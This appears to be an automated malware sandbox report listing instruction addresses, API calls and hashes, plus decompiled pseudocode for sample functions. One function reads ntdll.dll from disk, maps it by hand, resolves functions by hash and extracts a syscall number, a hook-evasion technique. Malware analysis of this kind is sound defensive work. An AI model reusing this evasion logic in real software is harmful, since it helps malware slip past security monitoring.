0x1000531b
0x10005324
0x10005325
0x1000532e
0x1000532f
0x10005338
0x10005339
0x10005342
0x10005343
0x1000534c
0x1000534d
0x10005356
0x10005357
0x10005360
0x10005361
0x1000536a
0x1000536b
0x10005374
0x10005375
0x1000537e
0x1000537f
0x10005388
0x10005389
0x10005392
0x10005393
0x1000539c
0x1000539d
0x100053a6
0x100053a7
0x100053b0
0x100053b1
0x100053ba
0x100053bb
0x100053c4
0x100053c5
0x100053ce
0x100053cf
0x100053d8
0x100053d9
0x100053e2
0x100053e3
0x100053ec
0x100053ed
0x100053f6
0x100053f7
0x10005400
0x10005401
0x1000540a
0x1000540b
0x10005414
0x10005415
0x1000541e
0x1000541f
0x10005428
0x10005429
0x10005432
0x10005433
0x1000543c
0x1000543d
0x10005446
0x10005447
0x10005450
0x10005451
0x1000545a
0x1000545b
0x10005464
0x10005465
0x1000546e
0x1000546f
0x10005478
0x10005479
0x10005482
0x10005483
0x1000548c
0x1000548d
0x10005496
0x10005497
0x100054a0
0x100054a1
0x100054aa
0x100054ab
0x100054b4
0x100054b5
0x100054be
0x100054bf
0x100054c8
0x100054c9
0x100054d2
0x100054d3
0x100054dc
0x100054dd
0x100054e6
0x100054e7
0x100054f0
0x100054f1
0x100054fa
0x100054fb
0x10005504
0x10005505
0x1000550e
0x1000550f
0x10005518
0x10005519
0x10005522
0x10005523
0x1000552c
0x1000552d
0x10005536
0x10005537
0x10005540
0x10005541
0x1000554a
0x1000554b
0x10005554
0x10005555
0x1000555e
0x1000555f
0x10005568
0x10005569
0x10005572
0x10005573
0x1000557c
0x1000557d
0x10005586
0x10005587
0x10005590
0x10005591
0x1000559a
0x1000559b
0x100055a4
0x100055a5
0x100055ae
0x100055af
0x100055b8
0x100055b9
0x100055c2
0x100055c3
0x100055cc
0x100055cd
0x100055d6
0x100055d7
0x100055e0
0x100055e1
0x100055ea
0x100055eb
0x100055f4
0x100055f5
0x100055fe
0x100055ff
0x10005608
0x10005609
0x10005612
0x10005613
0x1000561c
0x1000561d
0x10005626
0x10005627
0x10005630
0x10005631
0x1000563a
0x1000563b
0x10005644
0x10005645
0x1000564e
0x1000564f
0x10005658
0x10005659
0x10005662
0x10005663
0x1000566c
0x1000566d
0x10005676
0x10005677
0x10005680
0x10005681
0x1000568a
0x1000568b
0x10005694
0x10005695
0x1000569e
0x1000569f
0x100056a8
0x100056a9
0x100056b2
0x100056b3
0x100056bc
0x100056bd
0x100056c6
0x100056c7
0x100056d0
0x100056d1
0x100056da
0x100056db
0x100056e4
0x100056e5
0x100056ee
0x100056ef
0x100056f8
0x100056f9
0x10005702
0x10005703
0x1000570c
0x1000570d
0x10005716
0x10005717
0x10005720
0x10005721
0x1000572a
0x1000572b
0x10005734
0x10005735
0x1000573e
0x1000573f
0x10005748
0x10005749
0x10005752
0x10005753
0x1000575c
0x1000575d
0x10005766
0x10005767
0x10005770
0x10005771
0x1000577a
0x1000577b
0x10005784
0x10005785
0x1000578e
0x1000578f
0x10005798
0x10005799
0x100057a2
0x100057a3
0x100057ac
0x100057ad
0x100057b6
0x100057b7
0x100057c0
0x100057c1
0x100057ca
0x100057cb
0x100057d4
0x100057d5
0x100057de
0x100057df
0x100057e8
0x100057e9
0x100057f2
0x100057f3
0x100057fc
0x100057fd
0x10005806
0x10005807
0x10005810
0x10005811
0x1000581a
0x1000581b
0x10005824
0x10005825
0x1000582e
0x1000582f
0x10005838
0x10005839
0x10005842
0x10005843
0x1000584c
0x1000584d
0x10005856
0x10005857
0x10005860
0x10005861
0x1000586a
0x1000586b
0x10005874
0x10005875
0x1000587e
0x1000587f
0x10005888
0x10005889
0x10005892
0x10005893
0x1000589c
0x1000589d
0x100058a6
0x100058a7
0x100058b0
0x100058b1
0x100058ba
0x100058bb
0x100058c4
0x100058c5
0x100058ce
0x100058cf
0x100058d8
0x100058d9
0x100058e2
0x100058e3
0x100058ec
0x100058ed
0x100058f6
0x100058f7
0x10005900
0x10005901
0x1000590a
0x1000590b
0x10005914
0x10005915
0x1000591e
0x1000591f
0x10005928
0x10005929
0x10005932
0x10005933
0x1000593c
0x1000593d
0x10005946
0x10005947
0x10005950
0x10005951
0x1000595a
0x1000595b
0x10005964
0x10005965
0x1000596e
0x1000596f
0x10005978
0x10005979
0x10005982
0x10005983
0x1000598c
0x1000598d
0x10005996
0x10005997
0x100059a0
0x100059a1
0x100059aa
0x100059ab
0x100059b4
0x100059b5
0x100059be
0x100059bf
0x100059c8
0x100059c9
0x100059d2
0x100059d3
0x100059dc
0x100059dd
0x100059e6
0x100059e7
0x100059f0
0x100059f1
0x100059fa
0x100059fb
0x10005a04
0x10005a05
0x10005a0e
0x10005a0f
0x10005a18
0x10005a19
0x10005a22
0x10005a23
0x10005a2c
0x10005a2d
0x10005a36
0x10005a37
0x10005a40
0x10005a41
0x10005a4a
0x10005a4b
0x10005a54
0x10005a55
0x10005a5e
0x10005a5f
0x10005a68
0x10005a69
0x10005a72
0x10005a73
0x10005a7c
0x10005a7d
0x10005a86
0x10005a87
0x10005a90
0x10005a91
0x10005a9a
0x10005a9b
0x10005aa4
0x10005aa5
0x10005aae
0x10005aaf
0x10005ab8
0x10005ab9
0x10005ac2
0x10005ac3
0x10005acc
0x10005acd
0x10005ad6
0x10005ad7
0x10005ae0
0x10005ae1
0x10005aea
0x10005aeb
0x10005af4
0x10005af5
0x10005afe
0x10005aff
0x10005b08
0x10005b09
0x10005b12
0x10005b13
0x10005b1c
0x10005b1d
0x10005b26
0x10005b27
0x10005b30
0x10005b31
0x10005b3a
0x10005b3b
0x10005b44
0x10005b45
0x10005b4e
0x10005b4f
0x10005b58
0x10005b59
0x10005b62
0x10005b63
0x10005b6c
0x10005b6d
0x10005b76
0x10005b77
0x10005b80
0x10005b81
0x10005b8a
0x10005b8b
0x10005b94
0x10005b95
0x10005b9e
0x10005b9f
0x10005ba8
0x10005ba9
0x10005bb2
0x10005bb3
0x10005bbc
0x10005bbd
0x10005bc6
0x10005bc7
0x10005bd0
0x10005bd1
0x10005bda
0x10005bdb
0x10005be4
0x10005be5
0x10005bee
0x10005bef
0x10005bf8
0x10005bf9
0x10005c02
0x10005c03
0x10005c0c
0x10005c0d
0x10005c16
0x10005c17
0x10005c20
0x10005c21
0x10005c2a
0x10005c2b
0x10005c34
0x10005c35
0x10005c3e
0x10005c3f
0x10005c48
0x10005c49
0x10005c52
0x10005c53
0x10005c5c
0x10005c5d
0x10005c66
0x10005c67
0x10005c70
0x10005c71
0x10005c7a
0x10005c7b
0x10005c84
0x10005c85
0x10005c8e
0x10005c8f
0x10005c98
0x10005c99
0x10005ca2
0x10005ca3
0x10005cac
0x10005cad
0x10005cb6
0x10005cb7
0x10005cc0
0x10005cc1
0x10005cca
0x10005ccb
0x10005cd4
0x10005cd5
0x10005cde
0x10005cdf
0x10005ce8
0x10005ce9
0x10005cf2
0x10005cf3
0x10005cfc
0x10005cfd
0x10005d06
0x10005d07
0x10005d10
0x10005d11
0x10005d1a
0x10005d1b
0x10005d24
0x10005d25
0x10005d2e
0x10005d2f
0x10005d38
0x10005d39
0x10005d42
0x10005d43
0x10005d4c
0x10005d4d
0x10005d56
0x10005d57
0x10005d60
0x10005d61
0x10005d6a
0x10005d6b
0x10005d74
0x10005d75
0x10005d7e
0x10005d7f
0x10005d88
0x10005d89
0x10005d92
0x10005d93
0x10005d9c
0x10005d9d
0x10005da6
0x10005da7
0x10005db0
0x10005db1
0x10005dba
0x10005dbb
0x10005dc4
0x10005dc5
0x10005dce
0x10005dcf
0x10005dd8
0x10005dd9
0x10005de2
0x10005de3
0x10005dec
0x10005ded
0x10005df6
0x10005df7
0x10005e00
0x10005e01
0x10005e0a
0x10005e0b
0x10005e14
0x10005e15
0x10005e1e
0x10005e1f
0x10005e28
0x10005e31
0x10005e32
0x10005e3b
0x10005e3c
0x10005e45
0x10005e46
0x10005e4f
0x10005e50
0x10005e59
0x10005e5a
0x10005e63
0x10005e64
0x10005e6d
0x10005e6e
0x10005e77
0x10005e78
0x10005e81
0x10005e82
0x10005e8b
0x10005e8c
0x10005e95
0x10005e96
0x10005e9f
0x10005ea0
0x10005ea9
0x10005eaa
0x10005eb3
0x10005eb4
0x10005ebd
0x10005ebe
0x10005ec7
0x10005ec8
0x10005ed1
0x10005ed2
0x10005edb
0x10005edc
0x10005ee5
0x10005ee6
0x10005eef
0x10005ef0
0x10005ef9
0x10005efa
0x10005f03
0x10005f04
0x10005f0d
0x10005f0e
0x10005f17
0x10005f18
0x10005f21
0x10005f22
0x10005f2b
0x10005f2c
0x10005f35
0x10005f36
0x10005f3f
0x10005f40
0x10005f49
0x10005f4a
0x10005f53
0x10005f54
0x10005f5d
0x10005f5e
0x10005f67
0x10005f68
0x10005f71
0x10005f72
0x10005f7b
0x10005f7c
0x10005f85
0x10005f86
0x10005f8f
0x10005f90
0x10005f99
0x10005f9a
0x10005fa3
0x10005fa4
0x10005fad
0x10005fae
0x10005fb7
0x10005fb8
0x10005fc1
0x10005fc2
0x10005fcb
0x10005fcc
0x10005fd5
0x10005fd6
0x10005fdf
0x10005fe0
0x10005fe9
0x10005fea
0x10005ff3
0x10005ff4
0x10005ffd
0x10005ffe
0x10006007
0x10006008
0x10006011
0x10006012
0x1000601b
0x1000601c
0x10006025
0x10006026
0x1000602f
0x10006030
0x10006039
0x1000603a
0x10006043
0x10006044
0x1000604d
0x1000604e
0x10006057
0x10006058
0x10006061
0x10006062
0x1000606b
0x1000606c
0x10006075
0x10006076
0x1000607f
0x10006080
0x10006089
0x1000608a
0x10006093
0x10006094
0x1000609d
0x1000609e
0x100060a7
0x100060a8
0x100060b1
0x100060b2
0x100060bb
0x100060bc
0x100060c5
0x100060c6
0x100060cf
0x100060d0
0x100060d9
0x100060da
0x100060e3
0x100060e4
0x100060ed
0x100060ee
0x100060f7
0x100060f8
0x10006101
0x10006102
0x1000610b
0x1000610c
0x10006115
0x10006116
0x1000611f
0x10006120
0x10006129
0x1000612a
0x10006133
0x10006134
0x1000613d
0x1000613e
0x10006147
0x10006148
0x10006151
0x10006152
0x1000615b
0x1000615c
0x10006165
0x10006166
0x1000616f
0x10006170
0x10006179
0x1000617a
0x10006183
0x10006184
0x1000618d
0x1000618e
0x10006197
0x10006198
0x100061a1
0x100061a2
0x100061ab
0x100061ac
0x100061b5
0x100061b6
0x100061bf
0x100061c0
0x100061c9
0x100061ca
0x100061d3
0x100061d4
0x100061dd
0x100061de
0x100061e7
0x100061e8
0x100061f1
0x100061f2
0x100061fb
0x100061fc
0x10006205
0x10006206
0x1000620f
0x10006210
0x10006219
0x1000621a
0x10006223
0x10006224
0x1000622d
0x1000622e
0x10006237
0x10006238
0x10006241
0x10006242
0x1000624b
0x1000624c
0x10006255
0x10006256
0x1000625f
0x10006260
0x10006269
0x1000626a
0x10006273
0x10006274
0x1000627d
0x1000627e
0x10006287
0x10006288
0x10006291
0x10006292
0x1000629b
0x1000629c
0x100062a5
0x100062a6
0x100062af
0x100062b0
0x100062b9
0x100062ba
0x100062c3
0x100062c4
0x100062cd
0x100062ce
0x100062d7
0x100062d8
0x100062e1
0x100062e2
0x100062eb
0x100062ec
0x100062f5
0x100062f6
0x100062ff
0x10006300
0x10006309
0x1000630a
0x10006313
0x10006314
0x1000631d
0x1000631e
0x10006327
0x10006328
0x10006331
0x10006332
0x1000633b
0x1000633c
0x10006345
0x10006346
0x1000634f
0x10006350
0x10006359
0x1000635a
0x10006363
0x10006364
0x1000636d
0x1000636e
0x10006377
0x10006378
0x10006381
0x10006382
0x1000638b
0x1000638c
0x10006395
0x10006396
0x1000639f
0x100063a0
0x100063a9
0x100063aa
0x100063b3
0x100063b4
0x100063bd
0x100063be
0x100063c7
0x100063c8
0x100063d1
0x100063d2
0x100063db
0x100063dc
0x100063e5
0x100063e6
0x100063ef
0x100063f0
0x100063f9
0x100063fa
0x10006403
0x10006404
0x1000640d
0x1000640e
0x10006417
0x10006418
0x10006421
0x10006422
0x1000642b
0x1000642c
0x10006435
0x10006436
0x1000643f
0x10006440
0x10006449
0x1000644a
0x10006453
0x10006454
0x1000645d
0x1000645e
0x10006467
0x10006468
0x10006471
0x10006472
0x1000647b
0x1000647c
0x10006485
0x10006486
0x1000648f
0x10006490
0x10006499
0x1000649a
0x100064a3
0x100064a4
0x100064ad
0x100064ae
0x100064b7
0x100064b8
0x100064c1
0x100064c2
0x100064cb
0x100064cc
0x100064d5
0x100064d6
0x100064df
0x100064e0
0x100064e9
0x100064ea
0x100064f3
0x100064f4
0x100064fd
0x100064fe
0x10006507
0x10006508
0x10006511
0x10006512
0x1000651b
0x1000651c
0x10006525
0x10006526
0x1000652f
0x10006530
0x10006539
0x1000653a
0x10006543
0x10006544
0x1000654d
0x1000654e
0x10006557
0x10006558
0x10006561
0x10006562
0x1000656b
0x1000656c
0x10006575
0x10006576
0x1000657f
0x10006580
0x10006589
0x1000658a
0x10006593
0x10006594
0x1000659d
0x1000659e
0x100065a7
0x100065a8
0x100065b1
0x100065b2
0x100065bb
0x100065bc
0x100065c5
0x100065c6
0x100065cf
0x100065d0
0x100065d9
0x100065da
0x100065e3
0x100065e4
0x100065ed
0x100065ee
0x100065f7
0x100065f8
0x10006601
0x10006602
0x1000660b
0x1000660c
0x10006615
0x10006616
0x1000661f
0x10006620
0x10006629
0x1000662a
0x10006633
0x10006634
0x1000663d
0x1000663e
0x10006647
0x10006648
0x10006651
0x10006652
0x1000665b
0x1000665c
0x10006665
0x10006666
0x1000666f
0x10006670
0x10006679
0x1000667a
0x10006683
0x10006684
0x1000668d
0x1000668e
0x10006697
0x10006698
0x100066a1
0x100066a2
0x100066ab
0x100066ac
0x100066b5
0x100066b6
0x100066bf
0x100066c0
0x100066c9
0x100066ca
0x100066d3
0x100066d4
0x100066dd
0x100066de
0x100066e7
0x100066e8
0x100066f1
0x100066f2
0x100066fb
0x100066fc
0x10006705
0x10006706
0x1000670f
0x10006710
0x10006719
0x1000671a
0x10006723
0x10006724
0x1000672d
0x1000672e
0x10006737
0x10006738
0x10006741
0x10006742
0x1000674b
0x1000674c
0x10006755
0x10006756
0x1000675f
0x10006760
0x10006769
0x1000676a
0x10006773
0x10006774
0x1000677d
0x1000677e
0x10006787
0x10006788
0x10006791
0x10006792
0x1000679b
0x1000679c
0x100067a5
0x100067a6
0x100067af
0x100067b0
0x100067b9
0x100067ba
0x100067c3
0x100067c4
0x100067cd
0x100067ce
0x100067d7
0x100067d8
0x100067e1
0x100067e2
0x100067eb
0x100067ec
0x100067f5
0x100067f6
0x100067ff
0x10006800
0x10006809
0x1000680a
0x10006813
0x10006814
0x1000681d
0x1000681e
0x10006827
0x10006828
0x10006831
0x10006832
0x1000683b
0x1000683c
0x10006845
0x10006846
0x1000684f
0x10006850
0x10006859
0x1000685a
0x10006863
0x10006864
0x1000686d
0x1000686e
0x10006877
0x10006878
0x10006881
0x10006882
0x1000688b
0x1000688c
0x10006895
0x10006896
0x1000689f
0x100068a0
0x100068a9
0x100068aa
0x100068b3
0x100068b4
0x100068bd
0x100068be
0x100068c7
0x100068c8
0x100068d1
0x100068d2
0x100068db
0x100068dc
0x100068e5
0x100068e6
0x100068ef
0x100068f0
0x100068f9
0x100068fa
0x10006903
0x10006904
0x1000690d
0x1000690e
0x10006917
0x10006918
0x10006921
0x10006922
0x1000692b
0x1000692c
0x10006935
0x10006936
0x1000693f
0x10006940
0x10006949
0x1000694a
0x10006953
0x10006954
0x1000695d
0x1000695e
0x10006967
0x10006968
0x10006971
0x10006972
0x1000697b
0x1000697c
0x10006985
0x10006986
0x1000698f
0x10006990
0x10006999
0x1000699a
0x100069a3
0x100069a4
0x100069ad
0x100069ae
0x100069b7
0x100069b8
0x100069c1
0x100069c2
0x100069cb
0x100069cc
0x100069d5
0x100069d6
0x100069df
0x100069e0
0x100069e9
0x100069ea
0x100069f3
0x100069f4
0x100069fd
0x100069fe
0x10006a07
0x10006a08
0x10006a11
0x10006a12
0x10006a1b
0x10006a1c
0x10006a25
0x10006a26
0x10006a2c
0x10006a2d
0x10006a33
0x10006a34
0x10006a3a
0x10006a3b
0x10006a41
0x10006a42
0x10006a48
0x10006a49
0x10006a4f
0x10006a50
0x10006a56
0x10006a57
0x10006a5d
0x10006a5e
0x10006a64
0x10006a65
0x10006a6b
0x10006a6c
0x10006a72
0x10006a73
0x10006a79
0x10006a7a
0x10006a80
0x10006a81
0x10006a87
0x10006a88
0x10006a8e
0x10006a8f
0x10006a95
0x10006a96
0x10006a9c
0x10006a9d
0x10006aa3
0x10006aa4
0x10006aaa
0x10006aab
0x10006ab1
0x10006ab2
0x10006ab8
0x10006ab9
0x10006abf
0x10006ac0
0x10006ac6
0x10006ac7
0x10006acd
0x10006ace
0x10006ad4
0x10006ad5
0x10006adb
0x10006adc
0x10006ae2
0x10006ae3
0x10006ae9
0x10006aea
0x10006af0
0x10006af1
0x10006af7
0x10006af8
0x10006afe
0x10006aff
0x10006b05
0x10006b0e
0x10006b1e
0x10006b2e
0x10006b3e
0x10006b51
0x10006b64
0x10006b77
0x10006b8a
0x10006b9d
0x10006bb0
0x10006bc3
0x10006bd6
0x10006bdc
0x10006be6
0x10006bf0
0x10006bfa
0x10006c06
0x10006c11
0x10006c16
0x10006c18
0x10006c5b
0x10006c60
0x10006c63
0x10006c78
0x10006c8b
0x10006ca6
0x10006cac
0x10006cb3
0x10006cbf
0x10006cc5
0x10006cc8
0x10006ccc
0x10006cdf
0x10006ce5
0x10006ce8
0x10006cec
0x10006d05
0x10006d0b
0x10006d0d
0x10006d13
0x10006d1a
0x10006d22
0x10006d27
0x10006d29
0x10006d30
0x10006d3c
0x10006d4a
0x10006d77
0x10006d7d
0x10006d7f
0x10006d83
0x10006d83
0x10006d7f
0x10006d88
0x10006d88
0x00000000
0x10006d0d
0x00000000
0x10006cec
0x00000000
0x10006ccc
0x00000000
0x10006cb3
0x10006c1c
0x10006c27
0x10006c2c
0x10006c2e
0x00000000
0x00000000
0x10006c32
0x10006c3c
0x10006c41
0x10006c43
0x00000000
0x00000000
0x10006c47
0x10006c52
0x10006c57
0x10006c59
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 10004243: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 10004288

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 10006CA6

Part of subcall function 10004243: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 100042AC

VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 10006CDF
ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 10006D05
ExitProcess.KERNEL32(00000000), ref: 10006D88

Strings

910173b09155465f83abaa01c2635fbd, xrefs: 10006D13, 10006D16

Memory Dump Source

Source File: 00000000.00000002.667292789.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.667275361.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667281974.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.667287022.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667308042.0000000010008000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile$AllocExitFirstProcessProcess32ReadSnapshotToolhelp32Virtual
String ID: 910173b09155465f83abaa01c2635fbd
API String ID: 1928574196-421010194
Opcode ID: 010713cc89e90fd0fe4ebfc97d185fea32c3caf404389275be34861d5379f4d4
Instruction ID: 3f5c9113b9970645bc7b14cf7c30a1c84ec24cba227f8e8edad533943ee3593b
Opcode Fuzzy Hash: 010713cc89e90fd0fe4ebfc97d185fea32c3caf404389275be34861d5379f4d4
Instruction Fuzzy Hash: 91438715E94798A8E7B0C764BC62BB963B1AF84B10F2054C7E60CED1E1D6B51FD09F0A

Uniqueness

Uniqueness Score: -1.00%

Function 1000372D, Relevance: 10.7, APIs: 7, Instructions: 237
fileCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E1000372D(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				signed int _t169;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E100074AD();
				_v64 = E10007555(_v20, 0x8a111d91);
				_v68 = E10007555(_v20, 0x170c1ca1);
				_v52 = E10007555(_v20, 0xa5f15738);
				_v72 = E10007555(_v20, 0x433a3842);
				_v56 = E10007555(_v20, 0xd6eb2188);
				_v60 = E10007555(_v20, 0x50a26af);
				_v80 = E10007555(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E1000775D(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
								_t213 = _v32;
								_t68 = _t169 + 0x18; // 0x8000018
								_v40 = _v32 + _t68;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E100074C5(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E100074C5(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E10007555(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											FindCloseChangeNotification(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}

0x10003733
0x10003737
0x1000373b
0x10003741
0x10003742
0x10003748
0x10003749
0x1000374f
0x10003750
0x10003756
0x10003757
0x1000375d
0x1000375e
0x10003764
0x10003765
0x1000376b
0x1000376c
0x10003772
0x10003773
0x10003779
0x1000377a
0x10003780
0x10003784
0x10003788
0x1000378c
0x10003790
0x10003790
0x10003790
0x10003799
0x100037a9
0x100037b9
0x100037c9
0x100037d9
0x100037e9
0x100037f9
0x10003809
0x1000380c
0x10003813
0x10003832
0x10003839
0x00000000
0x00000000
0x10003848
0x1000384b
0x1000384f
0x10003865
0x10003868
0x1000386c
0x10003882
0x10003885
0x10003887
0x10003891
0x1000389d
0x100038a3
0x100038a7
0x100038aa
0x100038ae
0x100038c3
0x100038c6
0x100038ca
0x100038dd
0x100038e2
0x100038ef
0x100038ef
0x100038f6
0x100038f9
0x00000000
0x00000000
0x10003924
0x100038eb
0x100038eb
0x100038ec
0x100038ec
0x10003936
0x10003939
0x1000393d
0x10003941
0x10003945
0x1000394a
0x1000394a
0x1000394d
0x10003951
0x1000395d
0x1000395d
0x10003960
0x10003964
0x10003966
0x00000000
0x00000000
0x00000000
0x1000393f
0x00000000
0x100038cc
0x00000000
0x10003889
0x00000000
0x1000386e
0x00000000
0x10003851
0x1000396c
0x10003970
0x10003976
0x1000397b
0x1000397b
0x10003980
0x10003980
0x10003986
0x10003989
0x10003999
0x100039a3
0x100039a8
0x100039c2
0x100039c7
0x100039d7
0x100039d7
0x100039d8
0x100039c9
0x100039cf
0x100039cf
0x100039aa
0x100039b3
0x100039b7
0x100039b7
0x00000000
0x00000000
0x1000399b
0x00000000
0x10003999
0x100039e1
0x100039e9
0x100039f0
0x100039fc
0x100039fc
0x10003a05
0x10003a05
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 1000382F
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 100039FC

Memory Dump Source

Source File: 00000000.00000002.667292789.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.667275361.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667281974.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.667287022.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667308042.0000000010008000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 628e292d093be034094095b01c33aa7803eb191bff1c5d9c7fc24802aca83612
Instruction ID: 8f8d7656e467553450b9bd8f5582d084cd44d4b268e5b14fc5981fee17302169
Opcode Fuzzy Hash: 628e292d093be034094095b01c33aa7803eb191bff1c5d9c7fc24802aca83612
Instruction Fuzzy Hash: 04A1F234E00209EFEB11CFE4C985BEEBBB5FF08351F20845AE515BA2A5D7B59A50DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040583A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405845
0x00405849
0x0040584c
0x00405852
0x00405856
0x0040585a
0x00405862
0x00405869
0x0040586f
0x00405876
0x0040587d
0x00405885
0x00405887
0x00000000
0x00405887
0x00405891
0x00405898
0x004058ae
0x00000000
0x00000000
0x00000000
0x004058b0
0x004058b4

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
GetLastError.KERNEL32 ref: 00405891
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
GetLastError.KERNEL32 ref: 004058B0

Strings

C:\Users\user\Desktop, xrefs: 0040583A
C:\Users\user\AppData\Local\Temp\, xrefs: 00405860

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
